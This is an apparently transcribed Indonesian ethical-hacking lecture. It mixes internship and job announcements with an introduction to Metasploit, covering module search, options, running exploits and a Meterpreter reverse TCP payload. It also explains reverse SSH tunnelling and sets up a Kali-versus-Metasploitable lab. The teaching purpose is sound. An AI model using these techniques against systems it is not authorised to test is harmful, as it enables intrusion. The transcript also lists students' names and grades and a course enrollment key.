Oke, selamat malam. Assalamualaikum warahmatullahi wabarakatuh. Kita mulai aja ya. Lebih sisa juga saya share screen. Ini baru berapa? 2 orang ya. Oke, ditutup. Eh, Mana sih? Oke, mungkin saya kasih gambaran dulu dikit bentar ya. Jadi ada kisah-kisah yang sedang terjadi belakangan. Ini kita kuliahnya ethical hacking. Jadi kemarin udah sampai mana ya? Scanning udah ya kalau nggak salah ya. Nmap udah ya. Ini kayaknya udah. Kita akan masuk ke exploit yang dasar. Metasploit framework. Oke, kita akan coba masuk ini hari ini. Cuman sebelum masuk ke situ, saya mungkin harus kasih beberapa, ya mudah-mudahan nanti teman-teman tolong dikasih tahu ke yang lain ya. Jadi Pak Agung, jadi kita ada kerjasama sama paling enggak berapa? Yang keinget aja ya, Uni Air Cargo. Ini ada kerjaan di Uni Air Cargo. Ini butuh 30 orang buat bikin data training. Jadi Uni Air Cargo tuh kargo. Dia bantuin ekspor import barang dari luar ke dalam, dari dalam keluar. Konsekuensinya akan banyak dokumen yang harus lewat ke bea cukai. Dan ini kalau dokumennya manual, prosesnya lama. Jadi yang dikerjakan adalah semua dokumen itu dimasukin ke dalam database. Jadi hasil scan-scanan masuk database. Kalau masukinnya pakai orang lama. Jadi scanan dibaca pakai OLAMA, LLM, Large Language Model, terus masukin jadi JSON masukin ke database. Itu kerjanya kayak gitu, cuman untuk itu kita butuh data training. Nah, untuk data training ini mereka Uni Air Cargo minta 30 orang dari anak mahasiswa ITTS buat bantuin. Waktu minta 30 orang daftar. Udah gitu waktu mulai kerjanya tinggal sisa 20, 10 orang ngilang. Waktu kerja benerannya tinggal sisa 10 orang. Dari 30 hari ini tinggal 10 orang. Konsekuensinya butuh orang lagi. Nah, ini kalau Anda tertarik buat belajar AI dari awal, bikin data training segala macam, bisa ngomong sama Pak Agung. Itu satu. Terus yang kedua, ini cyber security urusannya. Saya dihubungin sama teman-teman di Cyber Rank AI. Anda bisa coba inilah, ini free, yang dapat kredit 61 kredit $1 sih ya. Dapat kayak ginian, Cyber Rank. Iseng banget ngodingnya. Bisa klik login, nanti kita bisa bikin account di sini. Oke, ada email, password, bisa sign pakai Google juga bisa. Nah, ini bisa sign pakai Google, dan kita bisa dengan 60 itu kita bisa menganalisa 3 sih sebenarnya. Ntar aja lah, saya nggak mau ngabisin ini saya soal kredit. Jadi kalau mau iseng bisa cyber rank. Jadi dia tugasnya adalah menganalisa apakah ada kebocoran data pribadi. Jadi di satu perusahaan, bisa di bank, bisa di mana terserah lah. Kita bisa ngevaluasi. Misalnya kita pengen ngevaluasi perusahaan tempat kita kerja. Ini semua anak-anak kerja kan ya. Masukin aja nama websitenya, nanti dia akan ngevaluasi ada nggak data yang bocor, kondisi cyber security-nya kayak gimana, apakah sudah comply ke undang-undang PDP. PDP itu perlindungan data pribadi ya. Bisa dicek sama si CyberRank ini, apakah perusahaan kita comply, sampai seberapa jauh comply-nya gitu. Nanti dia akan ngasih ranking, ngasih nilai lah. Nilainya tuh kayak nilai kredit bank sih. Jadi bank tuh ada nilai, bank ini kalau masih kredit bagus nggak. Ada AAA, AA, A, BBB, BBB, CCC, CCC gitu ya.
D, terus D kalau nggak cuma satu D doang. Oke. Nah, dia kan ngasih ranking seperti itu, gitu ya. Nah, si Cyberrank ini buka kesempatan 10 orang buat magang. Cuman dia pengennya anak-anak yang bagus juga sih yang masuk sini. Kalau anaknya nggak bagus, bakal ditendang sih sama Cyberrank. Jadi ada kesempatan buat magang, kalau bagus ditarik, kalau nggak bagus suruh belajar lagi ke kampus balik. Gitu kira-kira. Jadi ini ada kesempatan yang kedua, Cyberrank. Yang ketiga, ini hari Kamis besok, sebenarnya minggu lalu tuh 2 minggu lalu ya, Pak Agung udah ngobrol sama orang Jepang. Jadi ada kesempatan buat dikirim ke Jepang, buat magang sampai kerja di Jepang. Gitu. Saya bakal ketemu sama orangnya hari Kamis besok sih. Gitu. Jadi akan ada kesempatan buat ke Jepang juga. Cuma nanti mungkin perlu belajar bahasa Jepang. Cara belajar bahasa Jepang paling enak sih nonton film-film Jepang atau pakai ChatGPT belajar bahasa Jepang di ChatGPT. Jadi akan ada ini dari dulu sih udah banyak yang suka kayak gitu-gitu ke ITTS. Terus juga Ubuntu kemarin sudah ngambil 20 orang kan ya dari ITTS. Jadi banyak yang diambilin lah kita. Nggak apa-apa sih, bagus emang tugasnya kampus mah buat diambilin orangnya. Kalau nggak diambilin mah bukan kampus ya. Ini udah urusan Cyberrank udah beres. Nah sekarang ada satu lagi. Saya harus masukin ke chat kali ya. Chat. Ini dari chatnya dibuka. Nah ini urusannya sama Cyberrank sama ethical hacking lah ya, sama. Bisa dilihat di sini s.id/free/OWP-ebooks. Saya kasih URL-nya di chat. Silakan diambil dokumennya. Oke, saya akan enter. Saya masuk di sini. Di sini ada 2 dokumen baru yang saya upload hari ini sih sebetulnya. Udah salinan sih. Wow. Salinan. Ya, harusnya nggak perlu salinan nih. Kok ada salinan? Ini aneh. Ya udah nggak apa-apa. Di sini ada 2. Yang satu AI. AI sama statistik. Buku AI, nah buku pegangan hasilnya. Nggak ada sih. AI proaktif. Coba kalau saya search ketemu nggak? Statistik. Ini dia. Buku AI Statistik Kriminal Indonesia. Nah ini satu. Ini silahkan dibaca. Buku AI dan Statistik Kriminal Indonesia. Ini urusannya AI. Lebih ke arah AI. Tapi dia juga cyber security sih. Jadi ini cerita kisah gedenya kira-kira gini. Besok 24, enggak sampai 24 jam ya. Besok jam 8 pagi. Berapa jam lagi nih gue? 12 jam lagi lah kira-kira. 12 jam lagi saya akan posisinya ada di Kejaksaan Republik Indonesia. Bukan untuk terdakwa atau apa, bukan. Jadi mereka pengen bikin AI buat data kriminal Indonesia. Dan konsekuensi dari situ dia akan bikin kayak cloud data kriminal Indonesia, dan dia akan jalanin AI buat di situ. Oke. Nah ini kalau dibaca di sini silahkan dibaca aja. Ini diantara semua narasumbernya saya yang bikin buku doang. Saya yang bikin buku ya, yang lain enggak. Ini backgroundnya, latar belakang, urgensinya, wewenang, standar statistik, konsep. Nah mulai bacanya di daerah. Nah ini mulai teknologi analitik AI, statistik kriminal, terus machine learning. Ini udah machine learning segala macam. Kalau mau lebih enak, cara bacanya di lampiran sini. Oke, panduan instalasi open source stack buat AI-nya kayak gimana di halaman belakang lah, pokoknya halaman 248. Nah ini saya turun ke bawah ya.
Oke, 248. Nah, ini udah mulai nginstall. Ini codingan nih, udah. Saya masukin ya. Oke, codingannya kayak gimana segala macam. Nah, intinya di sini adalah si kisah gedenya kira-kira si kejaksaan akan bikin apa cloud buat naruh semua dokumen-dokumen eh, keputusan terus kasus-kasus yang ada, dan ini dokumennya akan ngomong ke polisi, akan ngomong ke Mahkamah Agung. Cuman jujur nggak ada orang kejaksaannya nggak gitu jago di AI sama infrastruktur, jadi kemungkinan besar mereka akan butuh orang sih. Buat kayak ginian dia butuh orang. Oke. Jadi akan butuh orang, dan ini orang-orang itu yang bisa main AI segala macam. Nanti kalau kita baca juga ada cyber security-nya di dalamnya sih. Ini ada cyber security-nya juga. Soalnya kita nggak mungkin ngoperasiin ini tanpa ngamanin makhluknya. Coba saya cari statis lagi. Ini keamanan. Ini ada keamanan, prinsip keamanan, autentikasi. Nah, ini ada sistem penghubungan layanan pemerintah. Ini udah masalah autentikasi, enkripsi segala macam. Nah, ini ada di sini nih. Buat ngamaninnya ada di bab 3 nih. Buat ngamanin ini semua. Ada lagi, coba lihat yang ngamanin lagi. Wah, ini mah referensi. Ini mulai untuk keamanan. Nah, ini keamanannya. Ini coba cari lagi. Oh, ini mah pelatihan. Audit keamanan. Jadi audit tuh pentest termasuk ya. Oke, jadi ada kerjaan kayak gitu, bakal banyak kerjaan seperti itu. Bayangin yang namanya kejaksaan kan bukan cuma satu ya, ada banyak kejaksaan tuh. Ada kejaksaan Jakarta Pusat lah, mana lah, bejibun lah kejaksaan. Belum lagi polisi, belum lagi Mahkamah Agung. Jadi banyak nih kerjaannya, orangnya nggak ada. Itu satu, ini udah urusan satu ini ya. Jadi ini besok saya masuk ke ini dokumennya bisa di-download ya, jangan khawatir. Yang kedua adalah framework. Nih. Framework peringkat keamanan cyber dan kepatuhan data pribadi. Kepatuhan itu compliance ya. Jadi ini sebetulnya tadi kan saya kasih lihat cyber rank. Ini akan yang dokumen yang tadi masuknya ke kejaksaan. Kalau yang ini dokumen ini akan masuk ke OJK. Nih ya. Menuju Sistem Nasional OJK Cyber Trust dan Data Privacy Ranking Framework. Ini. Istilah ini ono yang ngarang ya, jangan kuat. Ini ono ngarang aja. Tapi OJK akan dikasih, karena nggak ada yang ngerti sih. Harusnya ini kerjaannya Kominfo. Harusnya. Cuman mereka nggak mau ngerjain PR seperti ini. Ya udah saya kerjain aja sendiri tanpa anggaran. Gue bikin, gue lepasin free ke publik. Jadi ini OJK akan bikin ranking kayak tadi si CyberRank tadi. OJK akan bikin ranking untuk semua bank di Indonesia. Rankingnya akan berdasarkan cyber security sama data privacy. Dua itu yang jadi patokannya ya. Oh, disclaimer-nya belum saya tulis di sini. Perasaan udah gue bikin. Ya udah, ntar diedit lagi. Ini apa nih? Walah, kacau nih. Oh, ini masih kacau nih. Coba kata pengantarnya gimana? Oh, masih kosong. Executive summary-nya masih kosong. Oke, udah ada yang udah jadi sih sebetulnya. Wah, oke. Berarti ada yang nggak beres nih. Frame. Ya udah. Tapi intinya akan ada CyberRank tadi. Dari CyberRank kita bisa lihat ranking kondisi banknya tadi, apakah bagus apa enggak. Konsekuensi dari situ adalah butuh orang-orang yang bisa ngamanin banknya, bisa ngetes banknya, bagusnya di mana, perbaikannya kayak gimana. Jadi orang-orang kayak itu dibutuhin banget. Sekedar info aja, kalau di BCA aja, jumlah orang yang buat seperti itu ratusan orang. Jadi sekitar hampir 200 kali, 100 lebih lah orangnya yang buat kayak gituan di BCA. Belum di bank-bank yang lain. Itu. Jadi orangnya butuh banyak,
Dan kampus yang bikin orang seperti itu yang benar-benar jago hampir nggak ada. Di Indonesia mungkin yang termasuk bagus BINUS barangkali ya. Jadi BCA banyak ambil dari BINUS sih sebetulnya hari ini. Oke, jadi kondisinya seperti itu. Tapi ini bukan hanya BCA aja. Semua bank juga butuh yang kayak gituan sih sebetulnya. Selain bank juga ini proses ranking ini juga di kementerian lembaga karena ini akan masuk ke SPBE. Sistem pemerintahan berbasis elektronik akan ada seperti ini juga dan kita nggak mau sampai data pribadi jebol gitu. Jadi compliance ke undang-undang data pribadi, perlindungan data pribadi jadi penting banget, nggak mau sampai jebol, konsekuensinya butuh banyak orang supaya bisa aman semuanya gitu. Terus ya, jadi kondisinya udah seperti itu, orangnya dibutuhin. Oke, kalimatnya cuma gitu ya, sebenarnya orangnya butuh banyak sih. Oke, nah sekarang kita balik lagi, ini udah beres, Cyberrank udah beres. Ini ada Uniair Cargo, beres. Terus satu lagi, nanti hari Kamis saya ketemu sama orang-orang Jepang. Mereka minta orang dari Indonesia bisa ke Jepang magang dan sampai kalau yang bagus bisa diterusin kerja di Jepang. Tapi yang butuh orang bukan itu aja sih. Jepang kehabisan orang, Taiwan kehabisan orang. Dua itu kehabisan orang gila. Jadi Taiwan sama Jepang orangnya udah mulai habis karena orangnya nggak suka bikin anak. Alhamdulillah nggak suka bikin anak. Jadi mereka ngambil orang dari yang tempat lain. Padahal orang Jepangnya bakal mati kan. Jadi harus bikin anak sih sebenarnya kalau mau survive. Oke, sekarang kita lanjut ke urusan kuliah. Kita masuk ke sini, eksploitasi. Ini kalau ada pertanyaan silakan tulis silakan di chat aja ya. Kita Ilyasa sangat gemar ke Jepang. Oke, siap-siap. Tapi nanti kalau ke Jepang jangan lupa kuliah diselesain di Indonesia, di ITTS tetap diselesain ya. Maksudnya kita kuliah online gitu. Ini yang kemarin yang kayak gitu si Fata. Fata udah di wisuda kemarin, hari Sabtu kemarin wisuda. Jadi dia udah Eskom beneran. Tapi dia Februari posisi akan ada di Taiwan nerusin S2. Gitu. Itu Fata. Siapa si Heidi kemungkinan akan ke Eropa. Dia mau nerusin cari S2 di Eropa. Heidi dia nulis paling enggak satu paper jurnal udah terbit, dia lagi nulis satu paper jurnal lagi, jadi dia akan 2 paper jurnal. Udah gitu Amanda maunya ke Singapura dia, jadi pada cabut semua sih. Saran saya sih cari di luar lah, di Indonesia sakit hati, mending keluar deh. Anak saya aja lagi sakit hati sama Indonesia. Jadi pajaknya, jadi ini anak nih, cerita aja ya dikit ya. Anak saya kerjanya dari Polandia kemarin. Pajak di Indonesianya, jadi kan ditransfer duitnya dari Polandia, gajinya ditransfer dari Polandia ke Indonesia. Di pajaknya tahu nggak berapa? 40%. Jadi kalau lu kerja di Indonesia sakit hati sih, bisa kerja di Indonesia, cuman sakit hati sama pemerintah sendiri karena dipotong pajaknya gede banget, nyakitin. Jadi mendingan kita keluar aja sekalian, nggak dipajak. Maksudnya dipajaknya normal gitu, 10% oke lah. 40% kan sakit hati kita udah kerja. DIFR itu apa sih? Gue gak tahu. DIFR tengah arti orang. DIFR tenaon sih? Digital Forensic Incident Response. Yang buat ini ya? Yang buat yang buat apa sih? Kalau si Cyberrank itu dia bukan pakai forensik sih sebetulnya. Dia makanya OSINT, Open Source Intelligence sih sebetulnya. Jadi dia nggak nge-tap langsung ke infrastruktur yang kita punya. Si Cyberrank itu melakukan Open Source Intelligence sih sebetulnya. Dia dari informasi yang ada di luar aja. Dia nggak saya masuk. Tapi mereka sedang ngembangin supaya bisa masuk. Itu Cyberrank. Untuk AI, susah sih. Kalau saya sarannya gini ya, jangan percaya 100% sertifikat. Jadi kalau ini teknik jual diri ya, cara kita jual diri. Oke, kalau kita punya sertifikat mungkin kita bisa kasih tahu ke sebelah sana, oke saya punya sertifikat C segala macam.
Cuman mereka akan lebih yakin kalau kita misalnya saya sudah jadi narasumber webinar ini, topiknya ini. Itu mereka lebih percaya lagi. Lebih percaya lagi kalau kita bisa bilang saya sudah nulis buku tentang ini. Mereka lebih keren lagi. Lebih keren lagi kalau saya sudah nulis paper jurnal. Itu kader semua. Itu sih. Jadi ini teknik jual diri ya. Kalau sertifikat aja, ya, jujur. Kemarin teman-teman di PAN RB, Menpan, Pemberdayaan Aparatur Negara, Reformasi Birokrasi, PAN RB, itu mereka, ini kebetulan orangnya murid. Jadi dia cerita, dia cari pentester. Terus dibukalah lowongan kerja buat pentester. Oke. Terus buat ngetesnya, tahu nggak cara ngetesnya? Cara ngetesnya gini yang dia kerjain. Ini cewek nih. Dia install Metasploitable di server. Ini bisa masuk ke sini, SourceForge. Bisa kita ambil Metasploitable. Terus Metasploitable-nya dihilangin sama dia ininya, label-labelnya. Jadi kita nggak tahu bahwa itu Metasploitable. Terus orang-orang yang punya disuruh sama dia, coba nih serang, kasih tahu bolongnya di mana aja. Padahal bolongnya banyak banget. Ini Metasploitable bolongnya banyak kan. Ini yang punya sertifikat nggak bisa nemuin bolongnya di mana. Jadi terus dia bilang ke saya, Pak, itu anak-anak yang punya nggak bisa dipercaya. Gitu dia bilang gitu aja, udah simpel. Jadi dites langsung. Jadi lu punya sertifikat nggak ada jaminan karena si orang perusahaan yang ini, kalau ini kebetulan kementerian ya, Menpan RB kan kementerian. Dia nyari orang dites. Nggak bisa ternyata yang pada punya sertifikat nggak mempan buat ngebongkar ini aja nggak bisa gitu. Jadi sertifikat nggak ada jaminan sih sebetulnya. Mendingan lu sertifikat boleh aja tetap diambil, tapi webinar sebagai narasumber, udah gitu nulis buku, paper jurnal, itu yang harganya mahalnya di situ sih. Nulis buku gratis. Nggak gratis kalau di ITTS, bayar 250.000 buat dapat nomor ISBN ya. Cuman kalau tanpa ISBN gratis. Nah, terus ada pertanyaan tadi di atas, Black Arc. Kita ada belajar nggak? Saya tidak pakai Black Arc. Pusing soalnya. Caranya gini deh, pada dasarnya OS yang seperti itu agak ada overlapnya satu sama lain sama Kali Linux, ada overlapnya. Kalau yang spesialnya bisa caranya gini lah, ChatGPT, tanya aja apa beda Black Arc versus Kali Linux, itu aja. Jadi awalnya kalau saya pakai Kali Linux bukan nyoba karena gampang gitu. Ini dua-duanya buat pentest ya. Perbedaan evolusi pendekatan komunitasnya beda. Yang satu Debian, satu Arc, satu Offensive Security, ini nama komunitas ya. Tujuannya untuk pentest profesional, yang ini Security Research Pentest Tool Extreme. Jadi kalau dari sisi ekstrimnya, Black Arc lebih ekstrim. Stabilitas ini lebih ke stabilitas kemudahan penggunaan. Kalau ini sudah ekstrim. Dia bukan buat user biasa, ini orang-orang yang mau ekstrim aja. Jadi kalau dari sisi ekstrim, oke. Ini kayak kelasnya di atasnya Kali Linux di Black Arc. Oke. Terus jumlah toolnya ini 800-an, ya ini 2.800. Tapi toolnya sebagian nggak stabil ya, jangan khawatir. Terus sudah pre-install, yang ini belum. Milih sendiri. Ngikutin release Debian, ini bebas merdeka. Ini bisa dilihat di sini bedanya. Ini tingkat kesulitan gampang, ini susah. Itu. Tapi sarannya gini sih, kalau pakai Black Arc, kalau pengen pakai Black Arc sih, coba dulu yang Kali Linux, khatamin di Kali Linux, terus pindahin ke Black Arc supaya udah ada gambaran yang mau dikerjain apa sih, kira-kira itu sih. Saya nggak pakai Black Arc soalnya saya harus ngajarin orang yang dari nol. Jadi enggak. Iya, yang teori sih. Jadi sarannya yang punya kayak gitu nggak apa-apa, tetap diambil. Tapi tetap kita harus praktek sih. Kalau nggak, berabe urusan lu. Susah. Cari kerjanya susah. Soalnya yang kerja biasanya yang ditanya bukan lu punya sertifikat apa. Coba praktekin yang lu bisa. Gitu. Sekarang udah gitu.
Terus sertifikat nggak peduli lah sebenarnya sekarang, nggak terlalu. Tapi ya nolong lah buat ngefilter dari orang lain, sertifikat nolong. Cuma nanti kalau udah lewat yang itu, kan nanti masih ada yang punya sertifikat, ada berapa orang kan? Ya, wah, ya hajar satu-satu suruh praktek. Kira-kira gitu. Itu ya. Itu kejadiannya di Secure IT kayak gitu nih. Di perusahaannya nih. Secure IT. Secure.it.id. Praktek. Yang ini praktek nih. Lu kagak bisa praktek, nggak selamat ya di sini. Dan ini orangnya sadis-sadis nih. Orang ini sadis sih. Tapi kelihatan tamangnya sih baik-baik. Tapi kalau udah ngebully orang, parah. Ini parah ngebulinya sih. Gitu ya. Tumben ini jadi kayak gini. Nah, ini tampang yang baiknya kayak gini. Nah, ini suruh praktek. Kalau di sini praktek. Ini ngasih tahu dulu ya. Direkturnya. Direktur security. Direktur yang developer. Akan ada security punya beberapa anak perusahaan. Salah satunya adalah TNI Cyber. Nama perusahaannya TNI Cyber, bukan di bawahnya TNI, bukan. Itu direkturnya ijazahnya SMA, jangan khawatir. Jadi dia mah nggak peduli lu S1 apa, nggak peduli dia sih sebenarnya. Dan dia jago, jangan hati-hati aja, dia jago, bukannya orang bodoh. Ijazah SMA tapi jago. Itu beres ya. Sekarang kita masuk ke kuliah. Mana dia kuliah saya? Nih. Kita masuk Metasploit sama eksploitasi. Coba lihat. Kita akan pakai Kali Linux. Ini masih ngaco. Saya udah makainya 25. Coba kita masuk ke ini Ubuntu. Ini saya down dulu bentar. Ini bekas kuliah yang tadi. Kali Linux saya harus nyalain lagi. Terminal. Shutdown dulu ya bentar. Ini habis kuliah tadi. Kuliah mikroprosesor sama arsitektur komputer. Ngajarin bikin sistem operasi segala macam. Tadinya, cuma waktunya nggak cukup. Shutdown. Oke. Saya harus nyalain. Ini apa? Oh, ini lagi download buku nih. Kelihatan lagi download buku ya. Anti-inflammatory Quiet Book, Optical Science Engineering Novel for the Single Mode Understanding Nuclear Reactor Physics. Mampus lah bukunya. Pening kepala ngeliatnya. Oh, ini juga nggak dibutuhin. Arduino, tutup. Oke. Ini juga tutup aja. Oke. Sekarang saya harus jalanin Kali Linux sama apa sih namanya? Server buat korban. Oke, mana server korban? Ini server korban harus saya nyalain. Bentar, sebelum nyala saya harus set ininya dulu. Networknya saya udah bridging ke LAN ENP2S0. Ini LAN di komputer yang ini. Oke, saya jalanin servernya. Sekarang saya harus jalanin, oke. Saya harus jalanin Kali Linux. Ini ada 2025 1C, harusnya udah 2025.3 kalau nggak salah yang terakhirnya. Ini saya coba lihat dulu settingannya. Soalnya kalau nggak salah yang 2025 1 saya nggak jalan. Udah bridging, ini harus di bridge ya. Dia bisa milih mau internal network atau NAT apa segala macam. Pastiin dia bridge ke LAN. Oke. 3C ya. Iya. Saya masih satu ya, beda lah. Tapi ya gitu deh. Kalau cuma buat belajar ya masih bisa dipakai. Kita jalanin 1C-nya, mudah-mudahan nggak apa. Oke, ntar. Oke, sekarang kita coba baca. Ini buat kalau belum diinstal kita perlu install Metasploit Framework, tapi ini kondisi udah terinstall sih. Ini juga masih 2403 ya. Untuk Metasploit Framework kita makainya MSF Console. Paling asik dari sini tuh enaknya MSF Console tuh udah ada exploitnya tinggal dipakai aja. Kalau kita mau exploit apa kita bisa search exploitnya apa.
Kalau kita pengen targetin ke window, cari exploit tentang apa, tinggal cari aja di sini. Cara exploitnya adalah use. Kalau udah tahu exploitnya, kita bisa use. Oke. Terus kita bisa lihat optionnya apa aja. Biasa yang di set adalah hostnya apa, username passwordnya apa, atau share-nya apa, bisa di set. Terus kita bisa run, bisa dihajar, gitu ya. Payloads-nya adalah software yang buat kita pakai buat nyerang. Ini kebetulan payload-nya Windows X64 Metaplotter Reverse TCP, itu supaya kita bisa dari komputer ini balik ke kita komunikasinya. Ini local host-nya berapa, exploit. Ini kalau kita mau main reverse shell. Kalau yang normal-normal sampai sini udah selesai. Yang normal nih. Kalau kita komunikasi balik, kita makainya reverse shell, kita pakai payload yang reverse TCP. Oke, ini kita balik. Contohnya paling sederhana mah apa ya? Paling sederhana tuh reverse SSH. Coba cari reverse SSH GitHub. Nah, ini banyak yang reverse SSH tunneling, SSH reverse tunneling. Nah, ini IDN ID, ini banyak yang ngasih reverse SSH nih. Maksudnya buat apa reverse SSH ini? Dan ini dipakai buat hacker sih sebenarnya. Yang tadi itu reverse SSH. Hacker pakai ini, kalau yang ini yang baik-baik. Jadi kita bisa bikin website lokal di komputer kita, ditaruh di rumah, nggak masalah. Kita aktifin reverse SSH dari kalau SSH kan dari kita ke sana. Kalau reverse SSH kita install apa ya, kayak plugin di servernya kita. Nanti plugin ini akan connect ke server sebelah sana. Nanti dari sana connect balik ke kita. Kebayang ya? Jadi kita punya pasang plugin dulu, terus kita connect ke server sana pakai SSH, nanti server sana akan connect balik ke kita, ke server kita yang ada di sini. Kita bisa pasang website di sini semuanya, di komputer kita di rumah. Nanti dari internet, kan di rumah kita kan komputer segala macam di belakangnya firewall, di belakangnya NAT. Jadi sebetulnya dari internet nggak ada yang bisa masuk. Cuman kalau pakai reverse SSH, dari internet jadi bisa masuk ke tempatnya kita karena server yang di sana bikin sambungan SSH ke server kita di lokal sini. Jadi nyambung dia. Itu reverse SSH kira-kira kayak gitu sih. Coba ini ada di OnoWiki juga ada. Jadi destinationnya 192.168.021, di luarnya IP publiknya segini 13. Ini pura-pura ya 138.4799. Dia akan masuk lewat NAT, akhirnya balik ke sebelah sini. Tujuannya ke baliknya NAT itu. Jadi kira-kira kayak gitu sih. Nah, ini caranya. Kalau pakai shell di Linux aja. Kalau shell di Linux kita nggak masang plugin apa-apa. Pluginnya isinya cuman bikin SSH sih sebetulnya. Gitu. Ini reverse nih ngasih tahu. Kita reverse. Portnya berapa, port di sananya berapa, connect, kayak gitulah. Udah, nyambung dah. Oke, beres ya. Sip. Oke, ini beres. Sekarang kita akan coba masuk ke ini. Ini tutup. Ini tutup. Ini tutup. Coba udah nyala belum? Oke. Kali. Oke, saya masuk ke kali. Nah, sekarang udah dikali ya. Bisa digedein kagak sih? Saya masuk ke setting supaya gede aja sih sebenarnya. Kalau nggak ngeliatnya kan kecil.
ada display. Ini saya gedein 800 600, saya naikin jadi berapa? Ini ya. Oke, nggak putus kan? Keep this configuration. Entah kenapa dia nggak bisa nge-save. Jadi tiap kali harus kerubah. Sebel aja sih sebenarnya. Oke, ini udah masuk. Sekarang kita coba lihat di sini. Oke, kita cek IP address. Host F. Pakai host F ya. Oke, gimana caranya host F? Hostnya yang mana sih? Gue nggak tahu tombol host yang mana. If config. Oke. IP server 090, kontrol kanan. Kontrol yang kanan. Kontrol kanan F. Oke, bentar. Coba. Kontrol F, kontrol kanan F. Host home. Tengah arti. Switch. Oh, bisa milih ininya, terminalnya. Oh. Gue maunya yang ini. Udah stop ya. Ya, pokoknya kita dari sini. Tadi 90, kita coba cek yang ini berapa. If config. Oke, IP saya adalah 95 nih. 95 ya. Yang sana 90. Coba kita lihat di sini. Kita mau ngerjain apaan di sini. Udah lupa saya nulis kayak gini, udah lupa ngerjain apaan. Ini metasploitable, hands on. MSF console. Oh, oke. Ini ngasih lihat search sama use exploit segala macam. Kita coba ngejebolin SSH di 90 tadi ya. Paling gampang sih. Ini paling gampang. Paling gampang sih tanya ChatGPT aja. Sebetulnya gitu. Oke. Sudo kali. Supaya gede, saya gede ini hurufnya. Kalau nggak kekecilan, gimana cara gedein? View? Salah. Edit, zoom in. Edit, zoom in. Oke, clear layar. Kemudian hurufnya udah gede. Coba gedein lagi ya. MSF console. Biasanya harus ditambahin thank you. Kalau nggak dia ngamuk ya. Dia suka ngamuk kalau nggak kasih thank you. Oke, yang standby silahkan standby. Ini direkam, jadi kalau ada apa-apa sih ada rekamannya, mudah-mudahan rekamannya bagus ya. Soalnya kalau pakai yang laptop rekamannya jelek, suaranya kacau. Saya berapa kali dengerin yang laptop suaranya pecah. Mungkin volumenya kegedean kali ya. Oke, ini lagi loading. Nah, wish. Serem. Coba. Ini saya harus naikin ke atas sih. Oke, masih loading dia. Oke, ini udah mulai kelihatan. Kalau dia nggak kasih thank you, dia biasanya komplain. Apa gitu komplainnya. Nah, dia punya 2496 exploit. Payloadnya ada 1600 payload. Decoder, encoder, segala macam. Oh, banyak lah. Kira-kira kayak gitu. Nah, sekarang saya pengen nyerang si server SSH-nya. Coba. Kalau ini kan cuma gini doang caranya ya. Nah, sekarang kalau mau gombal, di share link info open course-nya. Oke. Masuk ke sini. Oh, sekalian saya kasih lihat open course ya. Open course supaya jangan salah enroll. Masuk ke open course ITTS ACID, udah masuk ke situ.
Mudah-mudahan sudah enroll, sudah apa registrasi. Nah, kuliah yang kita ambil tuh yang ini. Nih, nah nih, nggak keluar. Forensiknya nggak keluar. 2025. Ini dia, forensik. Ethical hacking. Oh, forensik sih. Kita ethical hacking. Nah, kalau kita klik di sini, ini angkanya 103. Tolong ingat angkanya 103 ya. Jadi URL benernya adalah 103, yang ini saya copy paste lah ke chat. Sini. Jadi kalau belum enroll ke sini, caranya adalah klik aja My Course, kemungkinan besar sudah ada SMA open course-nya banyak nih. SMA Matematika kelas 12, Big Data Database, ini open course, open course, open course. Jangan masuk yang open course yang ini. Oke. Di sini ada 2025 2 ethical hacking OWP. Jadi yang nilainya akan masuk ke dalam akademik adalah yang ITTS 2025-2 ethical hacking OWP. Ini yang nomornya 103. Caranya gimana masuknya? Bisa aja diklik URL 103 tadi, atau klik sembarangan course. Misalnya saya klik sembarangan yang ini. Ini klik sembarangan. Ini kan nomornya 11. Saya ganti 11-nya sama 103. Saya masuk ke ethical hacking. Oke. Saya bisa ngelihat siapa yang sudah terdaftar. Ini partisipannya ada 36 orang. Di sini ada Wildan, Haikal, Ilyasa, Fauzan, Muhammad Aska, Muhammad Bintang, Didi Saprudin, Aziz Fakih, Naufal Fatuh, Hafiz Habiullah, Ahmad Hizbullah, Rahmadian Jastia, Hanrinov KMP, Pandu, Arif, Andi Laini, Lukman Lukito, Fadil M, Mizanul Kubro, Ibnu Maksum, terus apa lagi nih? Ini ada beberapa lagi ya, Reza Permana, Febrianto Prasetyo, Rianto Pratama, Robi Ramjako, Muhammad Tuhfatur, Heral Sadewa, Farel Eka, Fajar Yulio, Rahmat Sidik, Nazar Sidik, Anal Haq, Surya Ningprang, Muhammad Saifuddin, Sangga Wijaya. Oke, ini yang udah ada. Kalau belum ada, tolong sebelah kanan ada tombol enroll, diklik. Nah, sekarang saya pengen cek nilai grades. Ini nilainya. Ini Haikal Al-Israki, yang atau saya lihat ujungnya aja ya. Ini ada kuis UTS UAS, silakan dikerjakan semua. Kondisi ujungnya, coba ada beberapa. Nih kondisi ujungnya. Ini harusnya taruh ke atasan dikit lah. Sorry. Ini siapa? Haikal. Ini nilai maksimumnya 100 ya. Ini masih 10 karena baru ngerjain apa? Kuis-kuis. Ini 10, 6, Ilyasa 6, terus siapa lagi nih? Didi Saprudin 9, Rahmadian 1,9, terus berapa lagi? Mizanul Kubro 7,4. Ini siapa? Ferdian Dio. Ini Prasetyo 1,3. Robi Ramjako 4, sekian. Muhammad Tufatur 2. Ini 6, Sangga Wijaya 6. Jadi masih sedikit nilainya karena baru ngerjain kuis-kuisnya. Tolong dikerjain. Key-nya apa? ITTS, saya tulis di sini ya. ITTS 2023. Key-nya ITTS 2023. Silakan masuk. Udah gitu tolong kerjakan kuis UTS UAS-nya dari sekarang. Udah dibuka, ini boleh dikerjain. Jadi jangan nunggu pengumuman dari akademik. Sekarang UTS, sekarang UAS, nggak usah. Kerjanya dari sekarang. Kalau nilainya bagus, kalau besok semua nilainya dapat A, ya udah nggak usah kuliah saya lagi juga nggak apa-apa sih. Kalau saya nggak peduli. Di saya nggak ada absen soalnya. Lu mau ngabsen, bolos ya serah. Beres ya. Yang penting nilainya bagus. Oke, ini beres ya udah. Oke, iyalah. Saya tutup lagi.
